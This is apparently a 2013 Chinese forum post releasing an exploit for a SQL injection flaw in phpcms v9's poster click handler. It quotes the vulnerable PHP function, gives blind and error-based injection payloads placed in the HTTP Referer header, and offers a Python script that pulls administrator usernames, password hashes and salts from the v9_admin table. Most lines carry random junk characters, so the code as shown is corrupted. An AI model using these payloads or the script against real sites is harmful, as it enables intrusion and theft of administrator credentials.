有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
: m; E4 U2 h5 K m" `* q" D
& j+ W( n- s8 k' ~问题函数\phpcms\modules\poster\index.php. v, a1 j+ g0 l$ N" R) ^
6 A3 U; c7 T$ t/ i2 t, \: t( Npublic function poster_click() {
9 o1 _9 q3 W- W Q; j+ i+ j5 `$ R$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 _7 J$ ?& \- t4 D: Z, _! }$r = $this->db->get_one(array('id'=>$id));
& b6 r6 L9 L, w! _3 Zif (!is_array($r) && empty($r)) return false;6 u1 v& @) J. E& A, [- |
$ip_area = pc_base::load_sys_class('ip_area');3 m4 A: `6 u/ j2 W* |
$ip = ip();) p: [+ ~6 v' ]
$area = $ip_area->get($ip);% t9 b# G" D5 f4 }6 ~2 @& d
$username = param::get_cookie('username') ? param::get_cookie('username') : ''; j Q3 Z; O! u% a7 [
if($id) {# v% v9 ~' [5 g6 s2 U" ?9 n1 p$ ]. [
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();5 O/ @2 a% N0 C1 R' m; o
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
, L( W# M5 I% y4 n# ~8 u! Y/ w5 G}/ v& D* ]; u8 D) O9 k9 E4 q( E
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));3 e9 F3 k$ n5 Z. m* f
$setting = string2array($r['setting']);- \5 p& L8 w( k' x8 n
if (count($setting)==1) {
: K+ b6 {+ q5 |. g; m$url = $setting['1']['linkurl'];9 x3 z! Y k9 M9 {+ L3 o$ Y0 R
} else {9 @' _$ e% h& t& e; s( U1 p$ j
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];( ^; o( H1 v: u! F
}
7 W, z) R# v0 S( n0 oheader('Location: '.$url);; |# B. V/ |: m0 Y ?. t
}
/ v( z* i, Y; S* |$ x4 }' U
2 ]: t4 |5 Z! c. u : R* U2 q; s# o4 {! K4 u4 |& P( \
! ~( Q- t0 q4 }' d9 B0 k5 d$ W利用方式:
3 W& `. J# U: _, a! {4 A* H
! ~9 V/ }: u- D" r5 s$ N- C" F0 U2 L1、可以采用盲注入的手法:; i% i7 P7 L) c* z
: J/ ^% x) q$ I1 M1 j' e! Kreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#' t; P8 u: O! ]" l( d- z) A( B
/ t4 W% n' D# K( U7 M, G- q/ e
通过返回页面,正常与否一个个猜解密码字段。
7 V3 ?7 u- @& X. J/ O
, p2 \& L; m; x6 \0 z+ Z2、代码是花开写的,随手附上了:
6 y$ K2 U; f& R+ Y1 f
' Z8 R G+ w4 H+ q) P( c u+ l1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#1 T P$ ~6 T i! ]; R8 i8 x" ^
! G2 N) c- _ {% p/ [
此方法是爆错注入手法,原理自查。- s8 }( h0 {$ N8 x$ j
8 ^$ e% o+ z* G: c
' n6 C" [* O. d' R% a
6 z' t# k* L3 w( Z利用程序:
4 k/ T) W, K# t2 A6 r$ X7 w7 X; c) o4 R7 j
#!/usr/bin/env python( v+ O0 o2 k& P
import httplib,sys,re9 i' |+ ^: U% k+ N R- k F
/ |- C) b! ], b! Q7 ?* h
def attack():" U4 _7 E( i+ ?( R
print “Code by Pax.Mac Team conqu3r!”
7 S* D' j* N' U. Iprint “Welcome to our zone!!!”2 W6 n: h- d1 t) _
url=sys.argv[1]
t9 g9 |4 R5 y _4 Y' _/ opaths=sys.argv[2]7 e6 t I N4 [: ~9 L3 F
conn = httplib.HTTPConnection(url)8 S. f$ G7 _! y E, l3 ~: g% z5 w
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,+ B3 I- g: g) _9 k# C& i: b$ j% D
“Accept”: “text/plain”,
; z! J: M1 w( z6 a: f“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
9 u. o) u! q: r6 G2 }: Econn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)+ T( N7 O8 c2 j
r1 = conn.getresponse()& G$ V4 V' N& R
datas=r1.read()
+ m$ d6 `, l, \" Xdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
' E/ z: D- C2 @' z: z# ]print datas[0]$ g5 u* U, v" \- L) m
conn.close()
( Z3 ~9 N: I; P- t8 Fif __name__==”__main__”:
; W8 c/ A: I$ u4 M$ {. R4 n1 oif len(sys.argv)<3:
# a% u: h; Y' r mprint “Code by Pax.Mac Team conqu3r”5 Z: Q1 k1 I- u# k
print “Usgae:”
d7 x4 E1 F2 Q% Yprint “ phpcmsattack.py www.paxmac.org /”
! a# r! q! h* w! G: Wprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”) V0 b" T! T3 |% i3 q
sys.exit(1)
# v$ U2 p% k m8 J& Battack() V7 n" w0 }) i6 u- @
8 j. H* w- j" l
|
发表于 2013-1-11 21:01:00
收藏
支持
反对